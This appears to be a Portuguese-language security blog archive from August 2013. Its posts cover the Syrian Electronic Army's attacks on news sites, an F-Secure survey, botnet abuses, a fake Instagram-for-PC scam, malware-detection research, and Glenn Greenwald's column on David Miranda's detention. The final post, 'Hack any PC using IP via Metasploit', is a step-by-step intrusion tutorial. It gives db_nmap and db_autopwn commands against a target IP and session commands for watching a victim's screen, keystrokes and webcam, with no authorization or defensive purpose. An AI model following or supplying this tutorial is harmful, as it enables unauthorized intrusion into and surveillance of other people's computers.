sexta-feira, 30 de agosto de 2013

NEWS: Sites do NYT e Twitter são alvos de hackers sírios

Empresas de mídia, incluindo New York Times, Twitter e Huffington Post, perderam o controle de alguns de seus sites na terça-feira depois que hackers apoiadores do governo sírio atacaram a empresa de Internet australiana que administra essas páginas.

O Exército Eletrônico da Síria (SEA), um grupo de hackers que atacou organizações midiáticas consideradas hostis ao presidente sírio, Bashar al-Assad, reivindicou o ataque ao Twitter e ao site do Huffington Post em uma série de mensagens no próprio Twitter.

Especialistas em segurança afirmaram que dados eletrônicos mostram que o NYTimes.com, o único site que ficou fora do ar por horas, redirecionou visitantes para um servidor controlado pelo grupo sírio antes de cair.

O porta-voz do New York Times, Eileen Murphy, publicou no Twitter que "o problema provavelmente foi resultado de um ataque externo malicioso", baseando-se em uma avaliação inicial.

O ataque ao Huffington Post foi limitado à plataforma britânica da web. Já o Twitter afirmou que a invasão provocou problemas de disponibilidade no site por 90 minutos, mas que nenhuma informação de usuário foi comprometida.

Os ataques ocorrem em um momento em que a administração Obama considera tomar ações militares contra o governo sírio, envolvido em uma guerra civil contra rebeldes há mais de dois anos.

Em agosto, hackers promovendo o Exército Eletrônico da Síria atacaram sites da CNN, Time e Washington Post ao invadir um serviço terceirizado utilizado por essas páginas. 


Fonte: http://www.decisionreport.com.br/publique/cgi/cgilua.exe/sys/start.htm?infoid=14532&sid=41

NEWS: F-Secure divulga estudo sobre comportamento digital

As diferenças comportamentais entre homens e mulheres são pauta para discussão há milhares de anos e não é difícil destacar um estereótipo ou outro na hora de se referir a cada gênero. No entanto, quando o assunto é a vasta quantidade de conteúdos digitais como fotos, vídeos, entre outros formatos, a diferença entre os sexos pode ser ainda mais significativa.

Uma pesquisa da F-Secure mostra que homens dão mais atenção à quantidade de conteúdo que possuem do que as mulheres, mas elas compartilham esse conteúdo com mais frequência. O estudo, concluído pela Gfk, abrangeu entrevistas pela web com 6 mil usuários de banda larga, com idade entre 20 e 60 anos, de 15 países: Alemanha, Itália, França, Reino Unido, Holanda, Bélgica, Suécia, Finlândia, Polônia, EUA, Brasil, Chile, Colômbia, Austrália e Malásia.

Quando questionados sobre a quantidade de conteúdo digital relacionado a fotos, vídeos, documentos e outros arquivos que eles têm em dispositivos, 23% dos entrevistados dizem que têm mais de 100 gigabytes de conteúdo, em comparação com 12% das mulheres. As entrevistadas em geral parecem não se importar com a quantidade de conteúdo, mas sim com o seu valor. Segundo a pesquisa, 46% das mulheres não sabem quantos arquivos possuem na rede, contra apenas 23% dos homens que dizem não saber sobre a quantidade de dados que mantêm online.

Quando o assunto é back-up os homens mostram uma preocupação maior com a preservação de conteúdos, 77% afirma fazer back-up contra 75% das mulheres. O levantamento aponta ainda que os homens estão um pouco mais dispostos a usar um serviço de back-up na nuvem, 25% afirma utilizar o serviço versus 21% das mulheres. Os demais usuários assumem que ainda utilizam de dispositivos como pen-drives, HDs externos e CDs para armazenar documentos. Dentro desse cenário, os homens dizem ainda fazer back-up de conteúdos com maior frequência e 33% realizam essa tarefa pelo menos uma vez por semana. Já entre as mulheres, apenas 25% realiza a função.

Facebook

Seja para fins de armazenamento ou apenas para compartilhar com os amigos, o Facebook figura no topo da lista de plataformas escolhidas para guardar informações. De acordo com a pesquisa, as mulheres são as que mais usam a rede social para este fim, com 39%. As entrevistadas assumiram carregar conteúdos no site pelo menos uma vez por semana em comparação a 34% dos homens.

O YouTube vem em segundo lugar e é um pouco mais popular entre os homens, 21% deles inserem conteúdo no site pelo menos uma vez por semana, seguidos por 19% das mulheres. Em se tratando do uso geral do Facebook, as mulheres utilizam a rede social mais do que os homens; 82% para elas e 78% para eles.

O armazenamento de conteúdo em nuvem levanta diversas questões sobre segurança. Entre as mulheres a preocupação é maior, 61% afirmam ficar apreensivas com o acesso não autorizado ao conteúdo que mantêm na nuvem e em serviços de back-up ou sites de redes sociais, já entre os homens essa preocupação atinge 57%.

Quando os usuários do Facebook foram questionados sobre as configurações de privacidade, 23% dos homens e das mulheres concordaram que não sabem como definir as configurações da plataforma para o nível de privacidade desejado. E quando a questão tratou dos filhos, os entrevistados apresentaram novamente preocupação igual, com 57% afirmando não se sentirem confortáveis ao saber que seus filhos podem não ter as configurações de segurança e privacidade adequadas.

Dispositivos

O mundo atual é multidispositivo e ambos os gêneros concordam que seria útil conseguir acessar todos os conteúdos de qualquer dispositivo. 64% das mulheres e 63% dos homens dizem que seria útil ter todo seu arquivo acessível em todos os seus dispositivos, onde quer que estejam. Já 60% dos homens e 59% das mulheres concordam que seria útil conseguir gerenciar em um só lugar todo o conteúdo armazenado nos variados serviços on-line que usam. 


Fonte: http://www.decisionreport.com.br/publique/cgi/cgilua.exe/sys/start.htm?infoid=14549&sid=41

quinta-feira, 29 de agosto de 2013

NEWS: Saiba o que um computador zumbi infectado por um botnet pode fazer





Empresas de segurança vem alertando internautas sobre o crescimento no número de ameaças para transformar computadores e dispositivos móveis em máquinas zumbis. A estratégia dos cibercriminosos é comandar remotamente milhares de computadores, pois assim não são facilmente identificados. Ou seja, muitos usuários infectados por botnets podem estar cometendo uma série de atos ilegais sem saber, como distribuir spams e malwares na web.

Recentemente, a Microsoft e o FBI trabalharam em conjunto para desarticular uma botnet que contava com dois milhões de computadores conectados, utilizados para fins maliciosos. O que mais surpreende é a investigação concluir que todas as máquinas pertenciam a empresas e pessoas que não tinham conhecimento de que faziam parte de uma rede criminosa.

A Kapersky, empresa de segurança digital, listou 10 das ilegalidades que hackers estão induzindo computadores e dispositivos moveis de usuários de todo mundo a cometer.

1. Spam.
Seu computador ou dispositivo móvel pode estar enviando milhares de e-mails e mensagens de texto sobre medicamentos e outros produtos falsificados enquanto você está online.

2. Fraude.
Controlando seu computador remotamente, criminosos podem fazer com que você clique em anúncios, mesmo se o seu navegador estiver fechado. A tática serve para aumentar o lucro com peças de publicidade que recebem valores por clique em plataformas de sites e blogs.

3. Distributed Denial of Service (DDoS).
Você pode estar participando sem saber de uma de uma estratégia para tirar sites do ar com ataques de excesso de tráfego. Hackers orquestram computadores e dispositivos móveis da rede zumbi para acessar os endereços das páginas em massa e prejudicar o acesso.

4. Dinheiro sujo.
Os cibercriminosos também utilizam os computadores infectados para gerar BitCoins que demorariam muito tempo utilizando apenas um computador. Os Bitcoins são aceitos como pagamento em mercadorias legais e ilegais e também podem ser trocados facilmente por moeda real.

5. Distribuir malware.
Outra estratégia muito utilizada é a de criar uma rede que distribui códigos maliciosos pela Internet. Cada computador da rede zumbi é utilizado para realizar downloads de conteúdo maliciosos e enviá-los para outros PCs propagando vírus.

6. Vender ‘warez’.
Esta prática pirata vende software oficiais craqueados que funcionam sem um número de série. Os hackers utilizam lojas virtuais secretas para oferecer estes programas, tudo isso utilizando seu computador remotamente e acessando dados usando a sua conexão.

7. Hacking.
Criminosos virtuais utilizam computadores infectados para esconder seus rastros em ações de hack. Caso a atividade seja rastreada, será direcionada a um computador da rede zumbi. Isso inclui roubo de dados, invasão de sistemas  e de privacidade e tantos outros crimes.

8. Baixar e assistir conteúdo ilegal.
Alguns países têm regras rígidas para quem faz download pirata. Por isso, cibercriminosos utilizam computadores de uma botnet para baixar arquivos ilegais. Sempre direcionando o acesso dos sites proibidos para computadores infectados, vistos como autores do crime.

9. Decifrar senhas.
A capacidade de processamento dos computadores da rede zumbi é utilizada para descobrir senhas valiosas. Muitos computadores juntos conseguem processar conteúdo em massa.

10. Roubar dados pessoais.
Dados pessoais são roubados por criminosos e seu rastro é atribuído a computadores da botnet. Além disso, dados do usuário do computador infectado também podem estar em perigo.

Proteja-se
Para evitar dores de cabeça, mantenha sempre boas práticas de navegação: evite entrar em sites com conteúdo duvidosos, abrir anexos de e-mais de desconhecidos e evite instalar softwares piratas e de origem desconhecida. Outra dica importante é manter um bom antivírus instalado em seu computador ou smartphone e ficar atento aos sintomas de invasão.

Fonte: http://www.techtudo.com.br/noticias/noticia/2013/08/saiba-o-que-um-computador-zumbi-infectado-por-um-botnet-pode-fazer.html

quinta-feira, 22 de agosto de 2013

NEWS: Novo golpe promete emular Instagram no PC e captura dados do usuário


Um novo golpe vem utilizando o nome do Instagram para enganar usuários na Internet. A empresa de segurança online Symantec identificou um anúncio que vem prometendo acesso à rede social diretamente no computador, sem usar smartphone. O software diz instalar uma espécie de emulador do aplicativo para que seja possível executá-lo no computador. Porém, isso é uma mentira. É só mais um processo malicioso em busca de dados de internautas.

A farsa é até bem feita. Funciona assim: depois de fazer o download da extensão, o usuário extrai um arquivo compactado onde há várias bibliotecas de vínculo dinâmico (.DLL) com um executável. O natural seria rodar o arquivo executável. Assim, uma tela semelhante à do Instagram para celular é exibida. Mas, quando o usuário tenta fazer login, recebe uma mensagem de erro dizendo que falta ainda um arquivo a ser baixado.

Caso a pessoa concorde em fazer o download, é redirecionada para uma página onde tem que preencher um formulário com diversos dados antes de baixar o suposto arquivo necessário para rodar o Instagram para PC. Assim, eles ganham acesso a diversos dados pessoais do usuário e podem utilizá-los para realizar outros golpes na rede e até acessarem redes sociais e e-mails dos internautas com suas credenciais de login e senha.

Além deste aplicativo malicioso, há uma outra versão do Instagram para PC que afirma que o usuário precisa “ativar” o Instagram para ele funcionar. Ao clicar na opção, ele também será levado para uma tela de preenchimento de formulários. Curiosamente, já há mais de quatro mil pessoas curtindo o “Instagram para PC” falso no Facebook e no Twitter, além de 1,8 mil no Google+.

Ambos os serviços, assim como muitas outras farsas, se beneficiam de buscas que que internautas fazem na rede. Por isso, uma recomendação da Symantec é: não procure por “Instagram no PC” no Google, Bing e serviços do tipo. O acesso às fotos da rede social deve ser feito apenas pelo  link direto do serviço.

“Para os usuários das redes sociais, é importante ter cuidado com os golpistas que tentam encontrar formas de convencê-los a fornecer dados de login, instalar aplicativos, ou copiar e colar o código em páginas da Web. Além disso, é importante não clicar em links suspeitos e relatar golpes usando os relatórios dentro do Facebook e outras redes sociais”, alerta a Symantec.

Fonte: http://www.techtudo.com.br/noticias/noticia/2013/08/novo-golpe-promete-emular-instagram-no-pc-e-captura-dados-do-usuario.html

terça-feira, 20 de agosto de 2013

NEWS: Malware Bites and How to Stop It

Malware Bites and How to Stop It


Antivirus software running on your computer has one big weak point -- if a new virus is released before the antivirus provider knows about it or before the next scheduled antivirus software update, your system can be infected. Such zero-day infections are common.

However, a key recent development in antivirus software is to incorporate built-in defences against viruses and other computer malware for which they have no prior knowledge. These defences usually respond to unusual activity that resembles the way viruses behave once they have infected a system. This so-called heuristic approach combined with regularly updated antivirus software will usually protect you against known viruses and even zero-day viruses. However, in reality, there are inevitably some attacks that continue to slip through the safety net.

Writing in a forthcoming issue of the International Journal of Electronic Security and Digital Forensics, researchers at the Australian National University, in Acton, ACT, and the Northern Melbourne Institute of TAFE jointly with Victorian Institute of Technology, in Melbourne Victoria, have devised an approach to virus detection that acts as a third layer on top of scanning for known viruses and heuristic scanning.

The new approach employs a data mining algorithm to identify malicious code on a system and the anomaly of behaviour patterns detected is predominantly based on the rate at which various operating system functions are being "called." Their initial tests show an almost 100% detection rate and a false positive rate of just 2.5% for spotting embedded malicious code that is in "stealth mode" prior to being activated for particular malicious purposes.

"Securing computer systems against new diverse malware is becoming harder since it requires a continuing improvement in the detection engines," the team of Mamoun Alazab (ANU) and Sitalakshmi Venkatraman (NMIT) explain. "What is most important is to expand the knowledgebase for security research through anomaly detection by applying innovative pattern recognition techniques with appropriate machine learning algorithms to detect unknown malicious behaviour."


Check out our new video about TabNapping: http://www.youtube.com/watch?v=xi8PJ-35oqE

domingo, 18 de agosto de 2013

Detaining my partner: a failed attempt at intimidation

The detention of my partner, David Miranda, by UK authorities will have the opposite effect of the one intended

At 6:30 am this morning my time - 5:30 am on the East Coast of the US - I received a telephone call from someone who identified himself as a "security official at Heathrow airport." He told me that my partner, David Miranda, had been "detained" at the London airport "under Schedule 7 of the Terrorism Act of 2000."

David had spent the last week in Berlin, where he stayed with Laura Poitras, the US filmmaker who has worked with me extensively on the NSA stories. A Brazilian citizen, he was returning to our home in Rio de Janeiro this morning on British Airways, flying first to London and then on to Rio. When he arrived in London this morning, he was detained.

At the time the "security official" called me, David had been detained for 3 hours. The security official told me that they had the right to detain him for up to 9 hours in order to question him, at which point they could either arrest and charge him or ask a court to extend the question time. The official - who refused to give his name but would only identify himself by his number: 203654 - said David was not allowed to have a lawyer present, nor would they allow me to talk to him.

I immediately contacted the Guardian, which sent lawyers to the airport, as well various Brazilian officials I know. Within the hour, several senior Brazilian officials were engaged and expressing indignation over what was being done. The Guardian has the full story here.
Despite all that, five more hours went by and neither the Guardian's lawyers nor Brazilian officials, including the Ambassador to the UK in London, were able to obtain any information about David. We spent most of that time contemplating the charges he would likely face once the 9-hour period elapsed.

According to a document published by the UK government about Schedule 7 of the Terrorism Act, "fewer than 3 people in every 10,000 are examined as they pass through UK borders" (David was not entering the UK but only transiting through to Rio). Moreover, "most examinations, over 97%, last under an hour." An appendix to that document states that only .06% of all people detained are kept for more than 6 hours.

The stated purpose of this law, as the name suggests, is to question people about terrorism. The detention power, claims the UK government, is used "to determine whether that person is or has been involved in the commission, preparation or instigation of acts of terrorism."
But they obviously had zero suspicion that David was associated with a terrorist organization or involved in any terrorist plot. Instead, they spent their time interrogating him about the NSA reporting which Laura Poitras, the Guardian and I are doing, as well the content of the electronic products he was carrying. They completely abused their own terrorism law for reasons having nothing whatsoever to do with terrorism: a potent reminder of how often governments lie when they claim that they need powers to stop "the terrorists", and how dangerous it is to vest unchecked power with political officials in its name.

Worse, they kept David detained right up until the last minute: for the full 9 hours, something they very rarely do. Only at the last minute did they finally release him. We spent all day - as every hour passed - worried that he would be arrested and charged under a terrorism statute. This was obviously designed to send a message of intimidation to those of us working journalistically on reporting on the NSA and its British counterpart, the GCHQ.

Before letting him go, they seized numerous possessions of his, including his laptop, his cellphone, various video game consoles, DVDs, USB sticks, and other materials. They did not say when they would return any of it, or if they would.

This is obviously a rather profound escalation of their attacks on the news-gathering process and journalism. It's bad enough to prosecute and imprison sources. It's worse still to imprison journalists who report the truth. But to start detaining the family members and loved ones of journalists is simply despotic. Even the Mafia had ethical rules against targeting the family members of people they felt threatened by. But the UK puppets and their owners in the US national security state obviously are unconstrained by even those minimal scruples.

If the UK and US governments believe that tactics like this are going to deter or intimidate us in any way from continuing to report aggressively on what these documents reveal, they are beyond deluded. If anything, it will have only the opposite effect: to embolden us even further. Beyond that, every time the US and UK governments show their true character to the world - when they prevent the Bolivian President's plane from flying safely home, when they threaten journalists with prosecution, when they engage in behavior like what they did today - all they do is helpfully underscore why it's so dangerous to allow them to exercise vast, unchecked spying power in the dark.
David was unable to call me because his phone and laptop are now with UK authorities. So I don't yet know what they told him. But the Guardian's lawyer was able to speak with him immediately upon his release, and told me that, while a bit distressed from the ordeal, he was in very good spirits and quite defiant, and he asked the lawyer to convey that defiance to me. I already share it, as I'm certain US and UK authorities will soon see.

Link Original: http://www.theguardian.com/commentisfree/2013/aug/18/david-miranda-detained-uk-nsa

sábado, 17 de agosto de 2013

Hack any PC using IP via Metasploit


Hack any PC using IP via Metasploit

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database.
Download here:http://www.postgresql.org/
Make sure you use all the defaults or Metasploit woun't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
watch the auto-exploitation start, go play Halo for a while, and then come back...

9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.